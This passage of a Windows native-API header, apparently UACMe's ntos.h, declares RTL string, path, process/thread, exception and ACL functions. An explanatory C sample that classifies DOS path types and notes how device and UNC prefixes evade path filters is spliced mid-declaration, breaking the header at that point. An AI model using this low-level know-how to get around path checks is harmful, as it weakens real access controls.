RtlCopyString( _In_ PSTRING DestinationString, _In_opt_ PSTRING SourceString); NTSYSAPI CHAR NTAPI RtlUpperChar( _In_ CHAR Character); NTSYSAPI VOID NTAPI RtlUpperString( _In_ PSTRING DestinationString, _In_ PSTRING SourceString); NTSYSAPI LONG NTAPI RtlCompareAltitudes( _In_ PCUNICODE_STRING Altitude1, _In_ PCUNICODE_STRING Altitude2); // // preallocated heap-growable buffers // typedef struct _RTL_BUFFER { PUCHAR Buffer; PUCHAR StaticBuffer; SIZE_T Size; SIZE_T StaticSize; SIZE_T ReservedForAllocatedSize; // for future doubling PVOID ReservedForIMalloc; // for future pluggable growth } RTL_BUFFER, *PRTL_BUFFER; typedef struct _RTL_UNICODE_STRING_BUFFER { UNICODE_STRING String; RTL_BUFFER ByteBuffer; UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)]; } RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER; // // These are OUT Disposition values. // #define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS (0x00000001) #define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC (0x00000002) #define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE (0x00000003) #define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004) NTSYSAPI NTSTATUS NTAPI RtlNtPathNameToDosPathName( _In_ ULONG Flags, _Inout_ PRTL_UNICODE_STRING_BUFFER Path, _Out_opt_ PULONG Disposition, _Inout_opt_ PWSTR* FilePart); NTSYSAPI ULONG NTAPI RtlIsDosDeviceName_U( _In_ PCWSTR DosFileName); NTSYSAPI ULONG NTAPI RtlGetFullPathName_U( _In_ PCWSTR lpFileName, _In_ ULONG nBufferLength, _Out_writes_bytes_(nBufferLength) PWSTR lpBuffer, _Out_opt_ PWSTR *lpFilePart); NTSYSAPI NTSTATUS NTAPI RtlGetSearchPath( _Out_ PWSTR *SearchPath); typedef enum _RTL_PATH_TYPE { RtlPathTypeUnknown, // 0 RtlPathTypeUncAbsolute, // 1 RtlPathTypeDriveAbsolute, // 2 RtlPathTypeDriveRelative, // 3 RtlPathTypeRooted, // 4 RtlPathTypeRelative, // 5 RtlPathTypeLocalDevice, // 6 RtlPathTypeRootLocalDevice // 7 } RTL_PATH_TYPE; NTSYSAPI RTL_PATH_TYPE NTAPI RtlDetermineDosPathNameType_U( _In_ PCWSTR DosFileName); #define HASH_STRING_ALGORITHM_DEFAULT 
(0) #define HASH_STRING_ALGORITHM_X65599 (1) #define HASH_STRING_ALGORITHM_INVALID (0xffffffff) NTSYSAPI NTSTATUS NTAPI RtlHashUnicodeString( _In_ const UNICODE_STRING *String, _In_ BOOLEAN CaseInSensitive, _In_ ULONG HashAlgorithm, _Out_ PULONG HashValue); NTSYSAPI NTSTATUS NTAPI RtlAppendUnicodeStringToString( _In_ PUNICODE_STRING Destination, _In_ PUNICODE_STRING Source); NTSYSAPI NTSTATUS NTAPI RtlAppendUnicodeToString( _In_ PUNICODE_STRING Destination, _In_opt_ PWSTR Source); NTSYSAPI VOID NTAPI RtlCopyUnicodeString( _In_ PUNICODE_STRING DestinationString, _In_ PUNICODE_STRING SourceString); NTSYSAPI NTSTATUS NTAPI RtlUpcaseUnicodeString( _Inout_ PUNICODE_STRING DestinationString, _In_ PUNICODE_STRING SourceString, _In_ BOOLEAN AllocateDestinationString); NTSYSAPI NTSTATUS NTAPI RtlDowncaseUnicodeString( _Inout_ PUNICODE_STRING DestinationString, _In_ PUNICODE_STRING SourceString, _In_ BOOLEAN AllocateDestinationString); NTSYSAPI VOID NTAPI RtlEraseUnicodeString( _Inout_ PUNICODE_STRING String); #define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001) NTSYSAPI NTSTATUS NTAPI RtlpEnsureBufferSize( _In_ ULONG Flags, _Inout_ PRTL_BUFFER Buffer, _In_ SIZE_T NewSizeBytes); #define RtlInitBuffer(Buff, StatBuff, StatSize) \ do { \ (Buff)->Buffer = (StatBuff); \ (Buff)->Size = (StatSize); \ (Buff)->StaticBuffer = (StatBuff); \ (Buff)->StaticSize = (StatSize); \ } while (0) #define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \ ( ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \ ? 
STATUS_SUCCESS \ : RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \ ) #define RtlFreeBuffer(Buff) \ do { \ if ((Buff) != NULL && (Buff)->Buffer != NULL) { \ if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) { \ UNICODE_STRING UnicodeString; \ UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \ RtlFreeUnicodeString(&UnicodeString); \ } \ (Buff)->Buffer = (Buff)->StaticBuffer; \ (Buff)->Size = (Buff)->StaticSize; \ } \ } while (0) NTSYSAPI VOID NTAPI RtlRunEncodeUnicodeString( _Inout_ PUCHAR Seed, _Inout_ PUNICODE_STRING String); NTSYSAPI VOID NTAPI RtlRunDecodeUnicodeString( _In_ UCHAR Seed, _Inout_ PUNICODE_STRING String); /************************************************************************************ * * RTL Integer conversion API. * ************************************************************************************/ struct in6_addr; NTSYSAPI PWSTR NTAPI RtlIpv4AddressToStringW( _In_ const struct in_addr *Addr, _Out_ PWSTR S); NTSYSAPI NTSTATUS NTAPI RtlIpv4StringToAddressW( _In_ PCWSTR AddressString, _In_ BOOLEAN Strict, _Out_ LPCWSTR *Terminator, _Out_ struct in_addr *Address); NTSYSAPI PWSTR NTAPI RtlIpv6AddressToStringW( _In_ struct in6_addr*Address, _Out_writes_(46) PWSTR AddressString); NTSYSAPI NTSTATUS NTAPI RtlIpv6StringToAddressW( _In_ PCWSTR AddressString, _Out_ PCWSTR * Terminator, _Out_ struct in6_addr*Address); //taken from ph2 NTSYSAPI NTSTATUS NTAPI RtlIntegerToChar( _In_ ULONG Value, _In_opt_ ULONG Base, _In_ LONG OutputLength, _Out_ PSTR String); NTSYSAPI NTSTATUS NTAPI RtlCharToInteger( _In_ PSTR String, _In_opt_ ULONG Base, _Out_ PULONG Value); NTSYSAPI NTSTATUS NTAPI RtlLargeIntegerToChar( _In_ PLARGE_INTEGER Value, _In_opt_ ULONG Base, _In_ LONG OutputLength, _Out_ PSTR String); NTSYSAPI NTSTATUS NTAPI RtlIntegerToUnicodeString( _In_ ULONG Value, _In_opt_ ULONG Base, _Inout_ PUNICODE_STRING String); NTSYSAPI NTSTATUS NTAPI RtlInt64ToUnicodeString( _In_ ULONGLONG Value, _In_opt_ ULONG Base, _Inout_ PUNICODE_STRING String); NTSYSAPI 
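RtlDetermineDosPathNameType_U, declared above with RTL_PATH_TYPE, is the classification the path-conversion routines beside it (RtlGetFullPathName_U, RtlDosPathNameToNtPathName_U) use to decide whether a DOS name is resolved against the process current directory, a per-drive current directory, a UNC server, or passed through as a device path. The following is an added example, not code from UACMe or from ntos.h: a portable C reimplementation of that classification following the behaviour documented by ReactOS and Wine (assumed to match ntdll on the inputs shown), plus a hardening helper that accepts only drive-absolute paths. The sample paths are constructed, WCHAR is a local 16-bit typedef, and `path_type_ascii`, `path_type_name` and `only_drive_absolute` are names chosen for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t WCHAR;
/* Same values as the RTL_PATH_TYPE enum declared in this header. */
typedef enum _RTL_PATH_TYPE {
    RtlPathTypeUnknown, RtlPathTypeUncAbsolute, RtlPathTypeDriveAbsolute,
    RtlPathTypeDriveRelative, RtlPathTypeRooted, RtlPathTypeRelative,
    RtlPathTypeLocalDevice, RtlPathTypeRootLocalDevice
} RTL_PATH_TYPE;

static int is_sep(WCHAR c) { return c == '\\' || c == '/'; }

/* Classification performed by RtlDetermineDosPathNameType_U on a NUL-terminated
 * WCHAR string, reimplemented from the ReactOS/Wine behaviour (assumption:
 * ntdll agrees on these inputs). Only the first four characters decide the
 * type; every check stops at the terminator, so short inputs are safe. */
static RTL_PATH_TYPE dos_path_type(const WCHAR *p) {
    if (is_sep(p[0])) {
        if (!is_sep(p[1])) return RtlPathTypeRooted;                    /* \x            */
        if (p[2] != '.' && p[2] != '?') return RtlPathTypeUncAbsolute;  /* \\server\x    */
        if (is_sep(p[3])) return RtlPathTypeLocalDevice;                /* \\.\x  \\?\x  */
        if (p[3] != 0) return RtlPathTypeUncAbsolute;                   /* \\.x          */
        return RtlPathTypeRootLocalDevice;                              /* \\.    \\?    */
    }
    if (p[0] == 0 || p[1] != ':') return RtlPathTypeRelative;           /* x, ""         */
    if (is_sep(p[2])) return RtlPathTypeDriveAbsolute;                  /* x:\           */
    return RtlPathTypeDriveRelative;                                    /* x:foo         */
}

/* ASCII convenience wrapper (the constructed inputs below are ASCII). */
static RTL_PATH_TYPE path_type_ascii(const char *s) {
    WCHAR buf[260]; size_t n = strlen(s);
    if (n >= 260) n = 259;
    for (size_t i = 0; i < n; i++) buf[i] = (WCHAR)(unsigned char)s[i];
    buf[n] = 0;
    return dos_path_type(buf);
}

static const char *path_type_name(RTL_PATH_TYPE t) {
    static const char *names[] = { "Unknown", "UncAbsolute", "DriveAbsolute", "DriveRelative",
                                   "Rooted", "Relative", "LocalDevice", "RootLocalDevice" };
    return (unsigned)t < 8 ? names[t] : "?";
}

/* Typical hardening check for a path received from a less-trusted caller:
 * accept drive-absolute paths only. Rooted ("\x") and drive-relative ("C:x")
 * names resolve against current directories the callee does not control, UNC
 * names reach the network, "\\?\" skips Win32 name normalization (8.3 names,
 * trailing dots and spaces, ".." folding) and "\\.\" addresses devices
 * directly, so a string allow-list applied before this check is meaningless. */
static int only_drive_absolute(const char *s) {
    return path_type_ascii(s) == RtlPathTypeDriveAbsolute;
}

int main(void) {
    const char *samples[] = { "C:\\Windows\\System32\\ntdll.dll", "C:temp.txt", "\\Windows",
                              "\\\\server\\share\\x.dll", "\\\\?\\C:\\Windows", "\\\\.\\pipe\\svc",
                              "\\\\.", "\\\\.foo", "notepad.exe", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s%s\n", samples[i], path_type_name(path_type_ascii(samples[i])),
               only_drive_absolute(samples[i]) ? "" : "  (rejected)");
    return 0;
}
```

Note that forward slashes count as separators throughout, so `//?/C:/x` is a LocalDevice path just as `\\?\C:\x` is; filters that only look for backslashes miss it.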
NTSTATUS NTAPI RtlUnicodeStringToInteger( _In_ PUNICODE_STRING String, _In_opt_ ULONG Base, _Out_ PULONG Value); /************************************************************************************ * * RTL Process/Thread API. * ************************************************************************************/ typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)( PRTL_USER_PROCESS_PARAMETERS ProcessParameters ); typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)( PVOID ThreadParameter ); typedef struct _RTL_USER_PROCESS_INFORMATION { ULONG Length; HANDLE Process; HANDLE Thread; CLIENT_ID ClientId; SECTION_IMAGE_INFORMATION ImageInformation; } RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; // // This structure is used only by Wow64 processes. The offsets // of structure elements should be the same as viewed by a native Win64 application. // typedef struct _RTL_USER_PROCESS_INFORMATION64 { ULONG Length; LONGLONG Process; LONGLONG Thread; CLIENT_ID64 ClientId; SECTION_IMAGE_INFORMATION64 ImageInformation; } RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64; NTSYSAPI NTSTATUS STDAPIVCALLTYPE RtlSetProcessIsCritical( _In_ BOOLEAN NewValue, _Out_opt_ PBOOLEAN OldValue, _In_ BOOLEAN CheckFlag); NTSYSAPI NTSTATUS STDAPIVCALLTYPE RtlSetThreadIsCritical( _In_ BOOLEAN NewValue, _Out_opt_ PBOOLEAN OldValue, _In_ BOOLEAN CheckFlag); NTSYSAPI NTSTATUS NTAPI RtlCreateEnvironment( _In_ BOOLEAN CloneCurrentEnvironment, _Out_ PVOID *Environment); NTSYSAPI NTSTATUS NTAPI RtlCreateEnvironmentEx( _In_ PVOID SourceEnv, _Out_ PVOID *Environment, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI RtlExpandEnvironmentStrings( _In_opt_ PVOID Environment, _In_reads_(SrcLength) PWSTR Src, _In_ SIZE_T SrcLength, _Out_writes_opt_(DstLength) PWSTR Dst, _In_ SIZE_T DstLength, _Out_opt_ PSIZE_T ReturnLength); NTSYSAPI NTSTATUS NTAPI RtlExpandEnvironmentStrings_U( _In_opt_ PVOID Environment, _In_ PCUNICODE_STRING Source, _Out_ PUNICODE_STRING Destination, _Out_opt_ PULONG
ReturnedLength); NTSYSAPI NTSTATUS NTAPI RtlSetCurrentEnvironment( _In_ PVOID Environment, _Out_opt_ PVOID *PreviousEnvironment); NTSYSAPI NTSTATUS NTAPI RtlQueryEnvironmentVariable_U( _In_opt_ PVOID Environment, _In_ PUNICODE_STRING Name, _Out_ PUNICODE_STRING Value); NTSYSAPI NTSTATUS NTAPI RtlSetEnvironmentVariable( _Inout_opt_ PVOID* Environment, _In_ PUNICODE_STRING Name, _In_opt_ PUNICODE_STRING Value); NTSYSAPI NTSTATUS NTAPI RtlDestroyEnvironment( _In_ PVOID Environment); NTSYSAPI NTSTATUS NTAPI RtlCreateProcessParameters( _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, _In_ PUNICODE_STRING ImagePathName, _In_opt_ PUNICODE_STRING DllPath, _In_opt_ PUNICODE_STRING CurrentDirectory, _In_opt_ PUNICODE_STRING CommandLine, _In_opt_ PVOID Environment, _In_opt_ PUNICODE_STRING WindowTitle, _In_opt_ PUNICODE_STRING DesktopInfo, _In_opt_ PUNICODE_STRING ShellInfo, _In_opt_ PUNICODE_STRING RuntimeData); NTSYSAPI NTSTATUS NTAPI RtlDestroyProcessParameters( _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters); NTSYSAPI NTSTATUS NTAPI RtlCreateProcessParametersEx( _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, _In_ PUNICODE_STRING ImagePathName, _In_opt_ PUNICODE_STRING DllPath, _In_opt_ PUNICODE_STRING CurrentDirectory, _In_opt_ PUNICODE_STRING CommandLine, _In_opt_ PVOID Environment, _In_opt_ PUNICODE_STRING WindowTitle, _In_opt_ PUNICODE_STRING DesktopInfo, _In_opt_ PUNICODE_STRING ShellInfo, _In_opt_ PUNICODE_STRING RuntimeData, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI RtlCreateUserProcess( _In_ PUNICODE_STRING NtImagePathName, _In_ ULONG Attributes, _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters, _In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor, _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, _In_opt_ HANDLE ParentProcess, _In_ BOOLEAN InheritHandles, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformation); NTSYSAPI NTSTATUS NTAPI RtlCreateUserThread( _In_ HANDLE 
Process, _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, _In_ BOOLEAN CreateSuspended, _In_ ULONG StackZeroBits, _In_opt_ SIZE_T MaximumStackSize, _In_opt_ SIZE_T InitialStackSize, _In_ PUSER_THREAD_START_ROUTINE StartAddress, _In_opt_ PVOID Parameter, _Out_opt_ PHANDLE Thread, _Out_opt_ PCLIENT_ID ClientId); NTSYSAPI VOID NTAPI RtlExitUserThread( _In_ NTSTATUS ExitStatus); NTSYSAPI VOID NTAPI RtlExitUserProcess( _In_ NTSTATUS ExitStatus); NTSYSAPI VOID NTAPI RtlFreeUserThreadStack( _In_ HANDLE hProcess, _In_ HANDLE hThread); NTSYSAPI VOID NTAPI RtlPushFrame( _In_ PTEB_ACTIVE_FRAME Frame); NTSYSAPI VOID NTAPI RtlPopFrame( _In_ PTEB_ACTIVE_FRAME Frame); NTSYSAPI PTEB_ACTIVE_FRAME NTAPI RtlGetFrame( VOID); NTSYSAPI PVOID NTAPI RtlEncodePointer( _In_ PVOID Ptr); NTSYSAPI PVOID NTAPI RtlDecodePointer( _In_ PVOID Ptr); /************************************************************************************ * * RTL Memory Buffer API. * ************************************************************************************/ NTSYSAPI SIZE_T NTAPI RtlCompareMemoryUlong( _In_ PVOID Source, _In_ SIZE_T Length, _In_ ULONG Pattern); NTSYSAPI VOID NTAPI RtlFillMemoryUlong( _Out_ PVOID Destination, _In_ SIZE_T Length, _In_ ULONG Pattern); NTSYSAPI VOID NTAPI RtlFillMemoryUlonglong( _Out_ PVOID Destination, _In_ SIZE_T Length, _In_ ULONGLONG Pattern); /************************************************************************************ * * RTL PEB API. * ************************************************************************************/ NTSYSAPI PPEB NTAPI RtlGetCurrentPeb( VOID); NTSYSAPI VOID NTAPI RtlAcquirePebLock( VOID); NTSYSAPI VOID NTAPI RtlReleasePebLock( VOID); /************************************************************************************ * * RTL Exception Handling API. 
* ************************************************************************************/ NTSYSAPI PVOID NTAPI RtlAddVectoredExceptionHandler( _In_ ULONG First, _In_ PVECTORED_EXCEPTION_HANDLER Handler); NTSYSAPI ULONG NTAPI RtlRemoveVectoredExceptionHandler( _In_ PVOID Handle); NTSYSAPI BOOLEAN NTAPI RtlDispatchException( _In_ PEXCEPTION_RECORD ExceptionRecord, _In_ PCONTEXT ContextRecord); NTSYSAPI PVOID NTAPI RtlAddVectoredContinueHandler( _In_ ULONG First, _In_ PVECTORED_EXCEPTION_HANDLER Handler); NTSYSAPI ULONG NTAPI RtlRemoveVectoredContinueHandler( _In_ PVOID Handle); NTSYSAPI VOID NTAPI RtlRaiseException( _In_ PEXCEPTION_RECORD ExceptionRecord); NTSYSAPI DECLSPEC_NORETURN VOID NTAPI RtlRaiseStatus( _In_ NTSTATUS Status); NTSYSAPI NTSTATUS NTAPI NtContinue( _In_ PCONTEXT ContextRecord, _In_ BOOLEAN TestAlert); NTSYSAPI NTSTATUS NTAPI NtRaiseException( _In_ PEXCEPTION_RECORD ExceptionRecord, _In_ PCONTEXT ContextRecord, _In_ BOOLEAN FirstChance); __analysis_noreturn NTSYSAPI VOID NTAPI RtlAssert( _In_ PVOID VoidFailedAssertion, _In_ PVOID VoidFileName, _In_ ULONG LineNumber, _In_opt_ PSTR MutableMessage); #define RTL_ASSERT(exp) \ ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE) #define RTL_ASSERTMSG(msg, exp) \ ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE) #define RTL_SOFT_ASSERT(_exp) \ ((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n", __FILE__, __LINE__, #_exp), FALSE) : TRUE) #define RTL_SOFT_ASSERTMSG(_msg, _exp) \ ((!(_exp)) ? 
(DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE) typedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)( _In_ PEXCEPTION_POINTERS ExceptionInfo ); NTSYSAPI VOID NTAPI RtlSetUnhandledExceptionFilter( _In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter); NTSYSAPI LONG NTAPI RtlUnhandledExceptionFilter( _In_ PEXCEPTION_POINTERS ExceptionPointers); /************************************************************************************ * * RTL Security API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI RtlGetOwnerSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _Out_ PSID *Owner, _Out_ PBOOLEAN OwnerDefaulted); NTSYSAPI NTSTATUS NTAPI RtlGetGroupSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _Out_ PSID *Group, _Out_ PBOOLEAN GroupDefaulted); NTSYSAPI NTSTATUS NTAPI RtlCreateSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _In_ ULONG Revision); NTSYSAPI NTSTATUS NTAPI RtlSetOwnerSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _In_ PSID Owner, _In_ BOOLEAN OwnerDefaulted); NTSYSAPI NTSTATUS NTAPI RtlCopySecurityDescriptor( _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor, _Out_ PSECURITY_DESCRIPTOR* OutputSecurityDescriptor); NTSYSAPI NTSTATUS NTAPI RtlMakeSelfRelativeSD( _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, _Out_writes_bytes_(*BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, _Inout_ PULONG BufferLength); NTSYSAPI NTSTATUS NTAPI RtlAbsoluteToSelfRelativeSD( _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, _Out_writes_bytes_to_opt_(*BufferLength, *BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, _Inout_ PULONG BufferLength); NTSYSAPI NTSTATUS NTAPI RtlSelfRelativeToAbsoluteSD( _In_ PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor, _Out_writes_bytes_to_opt_(*AbsoluteSecurityDescriptorSize, 
*AbsoluteSecurityDescriptorSize) PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor, _Inout_ PULONG AbsoluteSecurityDescriptorSize, _Out_writes_bytes_to_opt_(*DaclSize, *DaclSize) PACL Dacl, _Inout_ PULONG DaclSize, _Out_writes_bytes_to_opt_(*SaclSize, *SaclSize) PACL Sacl, _Inout_ PULONG SaclSize, _Out_writes_bytes_to_opt_(*OwnerSize, *OwnerSize) PSID Owner, _Inout_ PULONG OwnerSize, _Out_writes_bytes_to_opt_(*PrimaryGroupSize, *PrimaryGroupSize) PSID PrimaryGroup, _Inout_ PULONG PrimaryGroupSize); NTSYSAPI NTSTATUS NTAPI RtlSetDaclSecurityDescriptor( _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor, _In_ BOOLEAN DaclPresent, _In_opt_ PACL Dacl, _In_ BOOLEAN DaclDefaulted); NTSYSAPI NTSTATUS NTAPI RtlGetDaclSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _Out_ PBOOLEAN DaclPresent, _Out_ PACL* Dacl, _Out_ PBOOLEAN DaclDefaulted); NTSYSAPI NTSTATUS NTAPI RtlSetSaclSecurityDescriptor( _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor, _In_ BOOLEAN SaclPresent, _In_opt_ PACL Sacl, _In_ BOOLEAN SaclDefaulted); NTSYSAPI NTSTATUS NTAPI RtlGetSaclSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, _Out_ PBOOLEAN SaclPresent, _Out_ PACL* Sacl, _Out_ PBOOLEAN SaclDefaulted); NTSYSAPI ULONG NTAPI RtlLengthSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor); _Check_return_ NTSYSAPI BOOLEAN NTAPI RtlValidSecurityDescriptor( _In_ PSECURITY_DESCRIPTOR SecurityDescriptor); _Check_return_ NTSYSAPI BOOLEAN NTAPI RtlValidRelativeSecurityDescriptor( _In_reads_bytes_(SecurityDescriptorLength) PSECURITY_DESCRIPTOR SecurityDescriptorInput, _In_ ULONG SecurityDescriptorLength, _In_ SECURITY_INFORMATION RequiredInformation); NTSYSAPI NTSTATUS NTAPI RtlCreateAcl( _Out_writes_bytes_(AclLength) PACL Acl, _In_ ULONG AclLength, _In_ ULONG AclRevision); NTSYSAPI BOOLEAN NTAPI RtlValidAcl( _In_ PACL Acl); NTSYSAPI NTSTATUS NTAPI RtlQueryInformationAcl( _In_ PACL Acl, _Out_writes_bytes_(AclInformationLength) PVOID AclInformation, _In_ ULONG 
AclInformationLength, _In_ ACL_INFORMATION_CLASS AclInformationClass); NTSYSAPI NTSTATUS NTAPI RtlSetInformationAcl( _Inout_ PACL Acl, _In_reads_bytes_(AclInformationLength) PVOID AclInformation, _In_ ULONG AclInformationLength, _In_ ACL_INFORMATION_CLASS AclInformationClass); NTSYSAPI NTSTATUS NTAPI RtlAddAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG StartingAceIndex, _In_reads_bytes_(AceListLength) PVOID AceList, _In_ ULONG AceListLength); NTSYSAPI NTSTATUS NTAPI RtlDeleteAce( _Inout_ PACL Acl, _In_ ULONG AceIndex); NTSYSAPI NTSTATUS NTAPI RtlGetAce( _In_ PACL Acl, _In_ ULONG AceIndex, _Outptr_ PVOID *Ace); NTSYSAPI BOOLEAN NTAPI RtlFirstFreeAce( _In_ PACL Acl, _Out_ PVOID *FirstFree); NTSYSAPI BOOLEAN NTAPI RtlOwnerAcesPresent( _In_ PACL pAcl); NTSYSAPI NTSTATUS NTAPI RtlAddAccessAllowedAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAddAccessAllowedAceEx( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAddAccessDeniedAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAddAccessDeniedAceEx( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAddAuditAccessAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid, _In_ BOOLEAN AuditSuccess, _In_ BOOLEAN AuditFailure); NTSYSAPI NTSTATUS NTAPI RtlAddAuditAccessAceEx( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_ PSID Sid, _In_ BOOLEAN AuditSuccess, _In_ BOOLEAN AuditFailure); NTSYSAPI NTSTATUS NTAPI RtlAddAccessAllowedObjectAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_opt_ GUID *ObjectTypeGuid, _In_opt_ GUID *InheritedObjectTypeGuid, _In_ PSID Sid); NTSYSAPI 
NTSTATUS NTAPI RtlAddAccessDeniedObjectAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_opt_ GUID *ObjectTypeGuid, _In_opt_ GUID *InheritedObjectTypeGuid, _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAddAuditAccessObjectAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ ACCESS_MASK AccessMask, _In_opt_ GUID *ObjectTypeGuid, _In_opt_ GUID *InheritedObjectTypeGuid, _In_ PSID Sid, _In_ BOOLEAN AuditSuccess, _In_ BOOLEAN AuditFailure); NTSYSAPI NTSTATUS NTAPI RtlAddCompoundAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ UCHAR AceType, _In_ ACCESS_MASK AccessMask, _In_ PSID ServerSid, _In_ PSID ClientSid); NTSYSAPI NTSTATUS NTAPI RtlAddMandatoryAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ PSID Sid, _In_ UCHAR AceType, _In_ ACCESS_MASK AccessMask); NTSYSAPI PVOID NTAPI RtlFindAceByType( _In_ PACL pAcl, _In_ UCHAR AceType, _Out_opt_ PULONG pIndex); NTSYSAPI NTSTATUS NTAPI RtlDefaultNpAcl( _Out_ PACL* Acl); NTSYSAPI NTSTATUS NTAPI RtlAddProcessTrustLabelAce( _Inout_ PACL Acl, _In_ ULONG AceRevision, _In_ ULONG AceFlags, _In_ PSID ProcessTrustLabelSid, _In_ UCHAR AceType, _In_ ACCESS_MASK AccessMask); NTSYSAPI BOOLEAN NTAPI RtlValidSid( _In_ PSID Sid); NTSYSAPI BOOLEAN NTAPI RtlEqualSid( _In_ PSID Sid1, _In_ PSID Sid2); NTSYSAPI BOOLEAN NTAPI RtlEqualPrefixSid( _In_ PSID Sid1, _In_ PSID Sid2); NTSYSAPI ULONG NTAPI RtlLengthRequiredSid( _In_ ULONG SubAuthorityCount); NTSYSAPI PVOID NTAPI RtlFreeSid( _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlAllocateAndInitializeSid( _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, _In_ UCHAR SubAuthorityCount, _In_ ULONG SubAuthority0, _In_ ULONG SubAuthority1, _In_ ULONG SubAuthority2, _In_ ULONG SubAuthority3, _In_ ULONG SubAuthority4, _In_ ULONG SubAuthority5, _In_ ULONG SubAuthority6, _In_ ULONG SubAuthority7, _Out_ PSID *Sid); NTSYSAPI NTSTATUS NTAPI RtlInitializeSid( 
